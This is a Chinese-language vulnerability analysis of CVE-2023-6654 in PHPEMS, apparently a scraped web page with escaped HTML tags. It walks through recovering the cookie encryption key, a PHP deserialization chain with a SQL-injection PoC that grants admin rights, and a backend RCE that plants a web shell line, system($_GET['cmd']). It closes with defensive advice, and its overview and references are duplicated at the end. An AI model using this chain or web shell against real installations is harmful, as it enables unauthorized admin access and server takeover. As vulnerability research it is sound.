PHPEMS反序列化漏洞导致RCE的分析与利用<\/h1>

漏洞概述<\/h2>
PHPEMS系统存在一个反序列化漏洞(CVE-2023-6654)，攻击者可以通过精心构造的序列化数据实现远程代码执行(RCE)。该漏洞涉及多个关键环节，包括路由分析、密钥获取、反序列化链构造以及后台RCE利用。<\/p>

路由分析<\/h2>

PHPEMS采用MVC架构，路由加载逻辑如下：<\/p>

入口文件index.php<\/code>调用ginkgo->run()<\/code><\/p> <\/li>


run()<\/code>方法根据URL参数加载对应控制器：<\/p>
public<\/span> function<\/span> run<\/span>()
<\/span><\/span>{
<\/span><\/span>    self<\/span>::<\/span>$app =<\/span> self<\/span>::<\/span>$defaultApp;
<\/span><\/span>    $ev =<\/span> self<\/span>::<\/span>make<\/span>('ev'<\/span>);
<\/span><\/span>    if<\/span>($ev-><\/span>url<\/span>(0<\/span>)) {
<\/span><\/span>        self<\/span>::<\/span>$app =<\/span> $ev-><\/span>url<\/span>(0<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...加载对应控制器文件...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

URL解析使用parseUrl()<\/code>方法，会对参数进行urlencode处理，防止目录穿越<\/p>
<\/li>
<\/ol>
密钥获取<\/h2>
系统使用自定义加密算法处理cookie：<\/p>
public<\/span> function<\/span> encode<\/span>($info) {
<\/span><\/span>    $info =<\/span> serialize<\/span>($info);
<\/span><\/span>    $key =<\/span> CS<\/span>; \/\/ 加密密钥
<\/span><\/span><\/span><\/span>    \/\/ 简单加密算法
<\/span><\/span><\/span><\/span>    for<\/span>($i =<\/span> 0<\/span>; $i <<\/span> strlen<\/span>($info); $i++<\/span>) {
<\/span><\/span>        $p =<\/span> $i%<\/span>strlen<\/span>($key);
<\/span><\/span>        $info[$i] =<\/span> chr<\/span>(ord<\/span>($info[$i])+<\/span>ord<\/span>($key[$p]));
<\/span><\/span>    }
<\/span><\/span>    return<\/span> urlencode<\/span>($info);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>解密方法类似，只是做减法运算。可以通过以下方式获取密钥：<\/p>

获取加密后的cookie样本<\/li>
已知序列化数据的固定格式部分（如a:8:{s:13:"sessionuserid";s:2:"3<\/code>）<\/li>
通过加密算法逆向计算密钥<\/li>
对不确定的字符位置进行爆破<\/li>
<\/ol>
反序列化链构造<\/h2>
可利用的反序列化链：<\/p>

PHPEMS\session<\/code>类的__destruct<\/code>方法<\/li>
该方法会调用pdosql->makeUpdate()<\/code>生成SQL语句<\/li>
tablepre<\/code>参数可控，导致SQL注入<\/li>
<\/ol>
POC构造：<\/p>
namespace<\/span> PHPEMS<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> session<\/span> {
<\/span><\/span>    public<\/span> $sessionid=<\/span>'1111111'<\/span>;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>pdosql<\/span> =<\/span> new<\/span> pdosql<\/span>;
<\/span><\/span>        $this-><\/span>db<\/span> =<\/span> new<\/span> pepdo<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> pdosql<\/span> {
<\/span><\/span>    private<\/span> $db;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>tablepre<\/span>=<\/span>' x2_session set sessiongroupid=\'1\' where sessionid=\'96a0e7fc80194815f509d8ef101f2ab8\' -- '<\/span>;
<\/span><\/span>        $this-><\/span>db<\/span> =<\/span> new<\/span> pepdo<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> pepdo<\/span> {
<\/span><\/span>    private<\/span> $linkid =<\/span> 0<\/span>;
<\/span><\/span>    private<\/span> $log =<\/span> 1<\/span>;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>linkid<\/span>=<\/span>0<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>后台RCE利用<\/h2>
进入后台后，通过模板编辑功能实现RCE：<\/p>

找到compileBlock<\/code>方法，其中会调用eval<\/code><\/li>
后台有modifyBlock<\/code>功能可以编辑block内容<\/li>
将block类型改为4（直接执行代码）<\/li>
在内容中插入恶意PHP代码（注意第一行必须是命名空间）<\/li>
<\/ol>
利用步骤：<\/p>

修改block类型为4<\/li>
插入类似内容：
<?<\/span>php<\/span> namespace<\/span> PHPEMS<\/span>; system<\/span>($_GET['cmd'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
访问触发block解析的页面（如注册协议页面）<\/li>
<\/ol>
完整利用流程<\/h2>

获取加密密钥（通过分析cookie或爆破）<\/li>
构造反序列化payload修改sessiongroupid为1<\/li>
使用伪造的管理员cookie登录后台<\/li>
找到block编辑功能，修改类型并插入恶意代码<\/li>
访问触发页面执行任意命令<\/li>
<\/ol>
防御建议<\/h2>

使用标准的加密算法（如AES）替代自定义加密<\/li>
对反序列化操作进行严格限制，使用白名单机制<\/li>
对SQL查询中的表名进行严格过滤<\/li>
避免在模板编译中使用eval函数<\/li>
加强后台权限验证，防止垂直越权<\/li>
<\/ol>
参考<\/h2>

CVE-2023-6654<\/a><\/li>
原始分析文章：西湖论剑phpems分析<\/a><\/li>
<\/ul>

PHPEMS反序列化漏洞导致RCE的分析与利用<\/h1>

漏洞概述<\/h2> PHPEMS系统存在一个反序列化漏洞(CVE-2023-6654)，攻击者可以通过精心构造的序列化数据实现远程代码执行(RCE)。该漏洞涉及多个关键环节，包括路由分析、密钥获取、反序列化链构造以及后台RCE利用。<\/p>

参考<\/h2> CVE-2023-6654<\/a><\/li> 原始分析文章：西湖论剑phpems分析<\/a><\/li> <\/ul>

漏洞概述<\/h2>
PHPEMS系统存在一个反序列化漏洞(CVE-2023-6654)，攻击者可以通过精心构造的序列化数据实现远程代码执行(RCE)。该漏洞涉及多个关键环节，包括路由分析、密钥获取、反序列化链构造以及后台RCE利用。<\/p>

参考<\/h2>

CVE-2023-6654<\/a><\/li>
原始分析文章：西湖论剑phpems分析<\/a><\/li> <\/ul>